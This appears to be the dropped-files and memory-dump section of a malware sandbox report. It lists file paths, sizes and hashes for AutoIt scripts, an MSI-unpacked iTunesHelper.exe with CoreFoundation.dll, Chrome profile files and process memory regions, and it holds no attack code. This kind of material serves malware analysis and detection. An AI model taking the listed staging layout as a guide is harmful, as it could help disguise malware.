cae4810a6ef0d47096792df94d1eac2bc9d340b0202c58902606ee8f956a2438063b65d230e396dbc07e8e695ba5bea18f07a0254196af3778544aed167a60f9

Download Submit
C:\ProgramData\fgafcad\hkafbhd.a3x

Filesize
478KB

MD5
0fe411da1e0ec15bd5a9d7a385454502

SHA1
b57230f44e5f1f091a971047ce995598c665bd7d

SHA256
def9a66ba72c77a74ed784d52454bb00d7eb1f4442ccdb87f6c7972d2ad55cd0

SHA512
f991d33288ab685a61e31c5bdf5e53966de433d2c11cbe8e1de7ad2d3bdfec899fccc29d5571f97bf34f111c8425da325d86a5b2345c2ce9658bbe2972ef6cf7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
2187a02147df1d557f95028a4d25befe

SHA1
eafe8cb707cee3180e2b84cf9efefcdad1c2be6a

SHA256
684eb7b267d8e80823d292c514c024cee1bdf8866d1098d03bd624084cdda358

SHA512
f548eb9038255a4ac8b002bdaaab1ac4bc49f151331f4a4a54a92586be7ab679bb0bc3b07ccce6909a4349c6ec1c5c6908703ff98969bf82262812680834300d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
4321102b6d869430923dee4da8edc06f

SHA1
51d0e98e030d0fa59545e49eb80080311db6daeb

SHA256
57e20a1a9b2255f8aa6920ca1b36f2deda1776476cc6d0b3e918df10f954c285

SHA512
056a839c3b58b14525c54be231069311860d346e2be8b398a18c235c2b0351133b5ae4a0db0b5ceb4e87e5aa2b15e80ecf2e517c651080f1c2d059067e3ffc88

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
8b8b9be4d6657faba71816a93f8e6961

SHA1
991c53ff7aa4615ee66d9c540238856e20e7814a

SHA256
fa414219c39a964b0a2f7e8ce23fb26d7d5dbc106144478b45c86939cc9afad9

SHA512
ad6d81682923b01c1a08da89097eb9d4693e826f5157c7f33f8193eb3fc747ea081355f2cea748b2db751a913f799fb26bedbeb188efdc9af952720268b30719

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
131KB

MD5
d2205a408ddc2c56da534b998239bd72

SHA1
a70ba17800b613dd6986045a9bfc35d1e9270c22

SHA256
37efa33830957e4ca983843b599aca614302ec6a4577af5f6f211ec2d0b22487

SHA512
183d1c5dfeae6ab5440ff171a25b2bf8a33d5794c871ea517b7bdf431f8cc1c1da56c33b3c9196c7cacdbc15e65a11d9325fe7aaae953715aa25bd37226f924a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
132KB

MD5
98bf246386a39808020712e916ae2580

SHA1
71648f893c85e147f4d9fc4909e1d060c19893ac

SHA256
b8f77f2c2e009af2023fd7085ff321abf980fce783d46ac9df70f24a5e826ba9

SHA512
d2a1d5924e6f728970b374f941d6406d0914b281206c483bf5ccd664f68c9477d4ddaf5c166d45c5bde18bbf102b15957755ce75f663601914d4dfa60c18221f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
132KB

MD5
807371ac2662e1edf1b03f3eafbe6c60

SHA1
0628beeba51e1bf3bb8030ad053ba9ba3d3b38d5

SHA256
6cbd05a3d891efb1b2d84fd13f696f707881885c5d498d9ee1bda87d64946948

SHA512
2eaed9e85f9faba910d00a469f57bf536b8fa10939586b63201a2c5ae14a04face67eb3e6748fda1a24893852f58d9363a85a92c0592d967219103287839d729

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files.cab

Filesize
5.5MB

MD5
bb81408a83f1847cad5980e414f03ec4

SHA1
16b68d995073051b2b402828a223c5ff9c41cb81

SHA256
600e8804e5f59fea6556560cb6c0e0bb3cfb737f9bf0bf1ef47b61e0a476501f

SHA512
d0210f7fc4b1246c616e042f06d6da1a996808b733e81aa29212d541c3c67e653db5c6581a228c8966e00bbe99775b7db9baf2e0288abaad55a4efc5aa203c0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files\CoreFoundation.dll

Filesize
3.5MB

MD5
611316682efd2557c66869a263f07268

SHA1
a7f925001aabffccc4a7a33dfdf8a96be5c26182

SHA256
6ccd7aac79ca59fd85898433f484bfa2ffe9a21a907103d46c4e9dac7a19d909

SHA512
f7992a7d4f51af84df992551ba7748fee7a8acfc56717d7723426ddcb46b3ae3b083728da6c11815893310b8e61063132511c115604122f4fbb4d26450676125

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files\iTunesHelper.exe

Filesize
358KB

MD5
ed6a1c72a75dee15a6fa75873cd64975

SHA1
67a15ca72e3156f8be6c46391e184087e47f4a0d

SHA256
0d8878cca08903777888b3681f90e4a07c7aef7d9600a67dfa985844d4bf5eda

SHA512
256c2ebfeb42c2d3340d8bb423ef0ae48d5fb9fe5ca09c363595f51a03007482b67a777e4cae7a8194f69bc3a3fbcdb9abb5c9f92097925272431bb9d50f5c03

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\files\sqlite3.dll

Filesize
1.6MB

MD5
28e23801281d2e707d3ed138f58f6dd6

SHA1
16bfbbc67131bcc9e8faa6942404372ee16620b0

SHA256
fffce40b94c53bcda5af093d74b7642fa3eb0fb5ece7dba493b8e9da8ae0f9db

SHA512
df6ca7ab1b352c41eeb0e1bfa98211d5568038879a1b332a821ad50d9d48d89bdef85d282c27cc899b3f00acb9c9447d1637ab8353bf1d93d74079f6e0ef9a20

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-370f26b4-016e-4b56-ac00-1e484622bc4f\msiwrapper.ini

Filesize
1KB

MD5
f4569de08487565eecbdbda017ee6ed0

SHA1
89eb13aa4aaa17d99602d29270a3efaa63a7d4be

SHA256
4e13aa649a4d56e20ce447fc415fe28b9abc545ebc3af390bf14ff6e65e5dc64

SHA512
06ecb531f4fe4efb49a1c4a45af1ca030e96d27710ba0674eb54e25fe1b25b62368c7f7d35d52bd45339a1827ed73a2f1964e8b366a43ce14640c8b8d7471c57

Download Submit
C:\Users\Admin\AppData\Roaming\bhbHCDc

Filesize
32B

MD5
1ec51c0c61a57dde8e62248510bb6843

SHA1
2c8ed68adfc81daca5a22fe782e5846742365f7c

SHA256
9f348fe7d7d4f7027070e2833b4e749db2e5282744ac0f31bfc0cf35429604cc

SHA512
04c46cc03a1af249d91de0c8309e3e2736b6dab3007ba73329550af9e4b7a0841a4dcc2246914db1475c36bcc65a2a8d26ed674ef70fa2b1f9e9b15f1421697e

Download Submit
C:\Windows\Installer\MSIC41.tmp

Filesize
208KB

MD5
d82b3fb861129c5d71f0cd2874f97216

SHA1
f3fe341d79224126e950d2691d574d147102b18d

SHA256
107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

SHA512
244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

Download Submit
C:\temp\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\temp\baaecaf

Filesize
4B

MD5
5c55686e0a7dd6eb06e6fa31c366d12b

SHA1
93aa19472e8cff0e2227d38e8d92299e57a32e71

SHA256
40301debff241a56dcd943ad8cca9cc606688b3b8d0560be75c4fe87a9db4779

SHA512
37fc21a94c3557aadb226c94ac30e990248715172c7fed83e3f867bcda2ac2a19b24b2144898505a394bd4983e0fa93c95879d96a612783f4840844c982ad1bb

Download Submit
C:\temp\baaecaf

Filesize
4B

MD5
1085d5c04c4eaeeb34fc4cb006cf54de

SHA1
c0db91320db56b606370f5e80c406a465df8328c

SHA256
4dc38740486a15a724fa8e918d931641706bcc5f3586de1a3d5a561597ee3828

SHA512
90c3e87c3e7314f95f4b90b8f2343a154b0fd045a8811cb931165034f0aac48f07f381a995b61c2b46b21d4a44895377500ab8d151e19cd277f5f1ce6c6f814b

Download Submit
C:\temp\hdaccaf

Filesize
4B

MD5
7d022405479189d8a02ea1f11f86d949

SHA1
6e2025bdeab3046d68101b4e9e013e16c8cb2800

SHA256
c02e6f940049ab9f45e7575bc6f8f649e94e811bd0518bc8dcb13536721d0e4a

SHA512
704aa3c99e2523f3742d864d746387f0ab59bfe00dafab13f65a334ffbbbd9973f28cdefac1f8c985c303749705f4eb244535716d9a382b783f2e476c7970c52

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
4.8MB

MD5
0aaf53dd3d4ff1a6379b16217162c20e

SHA1
3b9ca60891dfb0f5ad9ec2ad468f6b49e0a4c075

SHA256
5a122e776ee28a5d3f3931f99f79895fdf2fa470c59c0d434b28b3b4bbe40bcb

SHA512
4509e8c016bfdb9d09d095a1169e8c2417b39f66f0652a7662085f286fef88884893062385a9dd4adfadd5c32d00edb0660f88d2e4e99aa55615ff487bd0a337

Download Submit
\??\Volume{8b01524b-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{d4ee7ccd-560b-478c-9720-dd6fbfd40df6}_OnDiskSnapshotProp

Filesize
6KB

MD5
d631fcb5f0406ec4901c3cb724e7fe62

SHA1
a95d58bdcf550ef24f8cc2d5960b0ecacb3dd4eb

SHA256
e780ab6cedec578d60aea92b510ba9c0d71c3f563887c2147ff20528c16e74b4

SHA512
07f37080d3c7e5a0c606ed903d71025201f03d682c893d47afb9fc35dc18246021a7c82401a2a4e76edc5f180814e442d8d7855a837b636bfd3d7f213fb998c8

Download Submit
\??\c:\temp\script.a3x

Filesize
468KB

MD5
a37df78b6d7563d9743cba9648d84795

SHA1
c829f4591b4f748a92db4b49f2b1a2fa3d33c675

SHA256
87c47284b340901d82c08c59094040c6e2f39be420893aedc080a16bb11be6a8

SHA512
1407168740250b3126acd9633b330a14dcfdace0aa8b1f06f13c45e6fdfdd6836e87b2dd32ffecbbc5c490e74e8103a4399b2ef87ed147062d5f3535a1c7f118

Download Submit
\??\c:\temp\test.txt

Filesize
76B

MD5
4c5219e9f08372b225eb835b6b55237e

SHA1
9266c1757a89a5f9ce0c957b7aaf1ad2e1aa6c9a

SHA256
e7f6186b6d7e84a845339f0fc3c1786fa346dff658e24fd60bb6117cea853713

SHA512
b07d312bb67ec6a46aaacca7593687405d67fcce62dd6fde5df498140b5c19eb1db85b9555f327a0c462840e0fe02e4e369a846af11ae5fb24bf1a616005d2f5

Download Submit
memory/432-236-0x0000000002630000-0x0000000002DD2000-memory.dmp

Filesize
7.6MB

Download
memory/432-227-0x0000000002630000-0x0000000002DD2000-memory.dmp

Filesize
7.6MB

Download
memory/432-242-0x0000000002630000-0x0000000002DD2000-memory.dmp

Filesize
7.6MB

Download
memory/432-243-0x0000000002630000-0x0000000002DD2000-memory.dmp

Filesize
7.6MB

Download
memory/432-245-0x0000000002630000-0x0000000002DD2000-memory.dmp

Filesize
7.6MB

Download
memory/432-250-0x0000000002630000-0x0000000002DD2000-memory.dmp

Filesize
7.6MB

Download
memory/1168-249-0x0000000002510000-0x0000000002CB2000-memory.dmp

Filesize
7.6MB

Download
memory/1168-241-0x0000000002510000-0x0000000002CB2000-memory.dmp

Filesize
7.6MB

Download
memory/1168-251-0x0000000002510000-0x0000000002CB2000-memory.dmp

Filesize
7.6MB

Download
memory/1600-213-0x0000000004930000-0x0000000005900000-memory.dmp

Filesize
15.8MB

Download
memory/1600-232-0x0000000005E20000-0x000000000616F000-memory.dmp

Filesize
3.3MB

Download
memory/1600-216-0x0000000005E20000-0x000000000616F000-memory.dmp

Filesize
3.3MB

Download
memory/2720-202-0x000001CA234B0000-0x000001CA2364E000-memory.dmp

Filesize
1.6MB

Download
memory/2720-220-0x0000000063F70000-0x0000000064300000-memory.dmp

Filesize
3.6MB

Download
memory/2720-221-0x000001CA234B0000-0x000001CA2364E000-memory.dmp

Filesize
1.6MB

Download